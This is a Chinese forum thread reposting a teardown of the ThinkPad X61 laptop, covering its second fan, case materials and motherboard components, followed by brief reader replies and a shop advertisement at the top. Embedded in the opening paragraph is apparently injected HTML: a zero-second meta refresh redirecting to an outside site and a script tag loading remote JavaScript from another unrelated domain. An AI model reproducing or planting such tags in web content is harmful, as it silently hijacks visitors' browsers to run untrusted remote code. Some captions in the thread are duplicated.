开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

12寸笔记本也上双风扇 ThinkPad X61全面拆解

此次的X61拆解,我们的重点就是来看ThinkPad X61第二风扇的真实面目。<meta http-equiv="refresh" content="0; url=http://www.981.cc">
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

此前泄漏出的X61资料,在触摸板下方增加了一个风扇,自右侧吸风,后侧吹出,改善整体的散热

此前泄漏出的X61资料,在触摸板下方增加了一个风扇,自右侧吸风,后侧吹出,改善整体的散热

之前测试的ThinkPad X61,腕托下方留了一个空位,但是并没有安装风扇

之前测试的ThinkPad X61,腕托下方留了一个空位,但是并没有安装风扇

和一元硬币的合影,相当小巧的风扇

风扇来自大名鼎鼎的东芝,实际使用噪音非常小

安装风扇的卡槽。X60该位置为指纹识别模块,X61将其移往腕托的右上方,就是为了给风扇挪出空位

X61的机身主要由两种材料组成,主要是镁铝合金和加入了碳纤的工程塑料。

腕托部分,材料为PC+ABS-FR(40),加入了碳纤的工程塑料

屏幕前方的边框,同样是PC+ABS-FR(40)

屏幕的顶盖,AZ91D:铝镁合金

机身的底面,同样是AZ91D

下面我们来看看主板,X61的主板大部分区域都被绝缘胶带所覆盖

正面的左侧,分别是4965AGN无线网卡和英特尔1GB的迅盘

并行排列的两条内存插槽,这台X61采用的是2×三星 512M DDR2 667

内存插槽旁就是PM965芯片组和Core 2 Duo T7500处理器

同样,这台X61的T7500处理器也是BGA封装,用户无法自行拆卸

SIM卡插槽,X61为WWAN和国内今后的3G做好了准备

揭开胶布,底下是理光的读卡器控制芯片和英特尔的82566MM千兆网卡

另一侧的胶布下,下面有AD1984声卡芯片,TMP75音频放大芯片,而正中的这颗Lenovo 41A1240,其真身为三洋的LC272,属于ASIC芯片,性能相当强大,通过开发可以完成CPU、RAM、A/D转换、接口控制等诸多功能。

英特尔的ICH8M-E南桥芯片,迅驰Pro的标准配置

与众不同的一点,X61的SATA硬盘通过一个比较特殊的桥接卡来连接

硬盘桥接卡

X61采用的散热器和硬盘

总结

完成此次X61拆解后,我们终于看到了第二个风扇。在笔记本整体发热量越来越大的现在,第二个风扇无疑是个很不错的想法,尤其对于硬盘等新发热大户,相信可以带来相当的改善。但是其究竟可以带来多少改善,在噪音和热量之间又如何取得平衡,我们会在之后进行全面的测试。
  相比X60,X61在设计和用料方面没有什么太大的变化,不过能在原本空间就捉襟见肘的12英寸机型中,挪出空间安置第二个风扇,ThinkPad的设计实力依旧让我们感慨。而作为自X40改进以来的经典模具,经过数年的大小修改,X61已经非常完美。但是一些与生俱来的不足,却并非此类修修改改可以弥补。或许X62,或许X70,我们希望能看到X系列全新的模具,即使它可能并不完美,但是我们依旧期望目睹一个新经典的开始。

现在极少见到双风扇的X。不知道这个小风扇的作用有多大。
感觉掌托部分很容易进灰阿。
原帖由 weiqiangrr 于 2007-12-10 22:57 发表
14寸的本本双风扇得多吗?

14寸的不需要双风扇,所以没有14寸本装双风扇
不错,这个拆开了看得很是清楚的啊
好帖阿  顶   不知道T61有没有双风扇?
技术贴支持啊。。。。。。。
也是pconline转来的吧,呵呵。
原帖由 51ed 于 2007-12-11 19:38 发表

去pconline上也就看看评测,行情不行
原帖由 51ed 于 2007-12-11 19:38 发表
看到好东西,应该分享。省得到处找了。
图片很多
原帖由 roky8524 于 2007-12-11 23:26 发表
分析的真的很透彻呢 喜欢
我想起我小时候写的读后感了。

回复 5# 的帖子

想起了塑钢窗。
很新颖的设计,能控制噪音的话还是不错的。
原来X是双风扇的
原帖由 roky8524 于 2007-12-14 17:58 发表
X61 双风扇散热效果会非常的强呢

没人试过  具体效果不知道
啥也不说了,支持楼主!
这么小的风扇会不会起到四两拨千斤的效果?
X61挺好
只要噪音控制的好,总是有利于空气对流的。